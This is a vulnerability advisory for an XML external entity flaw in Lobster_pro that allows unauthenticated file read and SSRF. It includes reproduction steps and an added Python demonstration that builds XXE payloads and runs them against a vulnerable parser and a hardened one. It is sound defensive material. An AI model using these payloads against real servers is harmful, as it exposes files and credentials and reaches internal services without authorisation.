Lobster_pro XML External Entity Vulnerability Allowing Arbitrary File Read and SSRF
Vulnerability
Lobster_pro versions prior to 4.12.6-GA contain an XML External Entity (XXE) vulnerability. The XML parser resolves external entities declared in attacker-supplied documents, and the affected request can be sent without authentication. An attacker can use this to read files on the application server and on network shares connected to it, and to make the server issue HTTP GET requests to arbitrary services, which may enable further attacks against hosts the attacker cannot reach directly.
Impact
Successful exploitation gives an attacker read access to files and directory listings on the application server and on adjacent SMB shares, which may expose configuration files, credentials and other secrets. The same flaw enables server-side request forgery (SSRF): the server can be made to issue GET requests to internal services or resources on the attacker's behalf.
Reproduction
Send an HTTP POST request whose body is an XML document that declares an external entity in an inline DTD and references it from the document body. The application's parser resolves the entity, so a SYSTEM identifier pointing at a local file or a network share makes it read that resource, and one pointing at an HTTP URL makes it issue a GET request. The result is visible in the response, which contains the requested file contents or directory listing in place of the entity reference.
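The following is an added example, not Lobster_pro code or the advisory's own proof of concept; it shows, with only the Python standard library, what the behaviour described above looks like from the parser's side. The `<data>` element name, the temporary file standing in for a sensitive server file, its `db_password=hunter2` content and the throwaway local HTTP server standing in for an internal service are all constructed for the demonstration. `parse_data(..., True)` is the vulnerable configuration (xml.sax with `feature_external_ges` enabled, which reads files and fetches http(s) URLs named in SYSTEM entities); `parse_data(..., False)` is the hardened one.

```python
"""XXE demonstration: a permissive parser next to a hardened one.
Added example using only the Python standard library; it is not Lobster_pro
code. The temp file, its content and the local HTTP server are constructed."""
import io
import os
import tempfile
import threading
import xml.sax
from http.server import BaseHTTPRequestHandler, HTTPServer
from xml.sax.handler import ContentHandler, feature_external_ges


class DataCollector(ContentHandler):
    """Collects the character data delivered inside <data>...</data>."""

    def __init__(self):
        super().__init__()
        self.inside = False
        self.chunks = []

    def startElement(self, name, attrs):
        if name == "data":
            self.inside = True

    def endElement(self, name):
        if name == "data":
            self.inside = False

    def characters(self, content):
        if self.inside:
            self.chunks.append(content)


def xxe_payload(system_id: str) -> str:
    """The document shape the advisory describes: an inline DTD declares an
    external SYSTEM entity (file path or URL) and the body dereferences it."""
    return (
        '<?xml version="1.0"?>\n'
        f'<!DOCTYPE root [<!ENTITY xxe SYSTEM "{system_id}">]>\n'
        "<root><data>&xxe;</data></root>\n"
    )


def parse_data(xml_text: str, resolve_external: bool) -> str:
    """Parse xml_text and return the text of <data>.
    resolve_external=True is the vulnerable configuration: xml.sax follows
    SYSTEM entities, reading local files and fetching http(s) URLs.
    False (the stdlib default since Python 3.7.1) silently drops them."""
    parser = xml.sax.make_parser()
    parser.setFeature(feature_external_ges, resolve_external)
    collector = DataCollector()
    parser.setContentHandler(collector)
    parser.parse(io.BytesIO(xml_text.encode()))
    return "".join(collector.chunks)


def demo_file_read() -> tuple:
    """Arbitrary file read: returns (vulnerable_result, hardened_result)."""
    with tempfile.NamedTemporaryFile("w", suffix=".txt", delete=False) as f:
        f.write("db_password=hunter2")  # constructed stand-in for a secret
        path = f.name
    try:
        payload = xxe_payload(path)
        return parse_data(payload, True), parse_data(payload, False)
    finally:
        os.unlink(path)


class _InternalService(BaseHTTPRequestHandler):
    """Stand-in for an internal HTTP service; records the path requested."""
    seen = []

    def do_GET(self):
        _InternalService.seen.append(self.path)
        body = b"internal-service-banner"
        self.send_response(200)
        self.send_header("Content-Length", str(len(body)))
        self.end_headers()
        self.wfile.write(body)

    def log_message(self, *args):
        pass  # keep the demo quiet


def demo_ssrf() -> tuple:
    """SSRF: returns (text the parser fetched, path the service saw)."""
    server = HTTPServer(("127.0.0.1", 0), _InternalService)
    threading.Thread(target=server.serve_forever, daemon=True).start()
    try:
        url = f"http://127.0.0.1:{server.server_port}/admin/status"
        fetched = parse_data(xxe_payload(url), True)
        return fetched, _InternalService.seen[-1]
    finally:
        server.shutdown()
        server.server_close()


if __name__ == "__main__":
    print("file read:", demo_file_read())
    print("ssrf     :", demo_ssrf())
```

Run the script directly to see both results: the vulnerable parse returns the file's contents while the hardened parse returns an empty string, and the SSRF case shows the request arriving at the stand-in service with the attacker-chosen path. The parser-side fix is the same idea on any stack: reject DOCTYPE declarations or disable resolution of external general and parameter entities before parsing untrusted input. The SSRF variant is worth testing separately, because a parser can still fetch a URL and deliver a request to an internal service even when the fetched body never makes it into the response.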
Remediation
Users are advised to update Lobster_pro to version 4.12.6-GA or later.
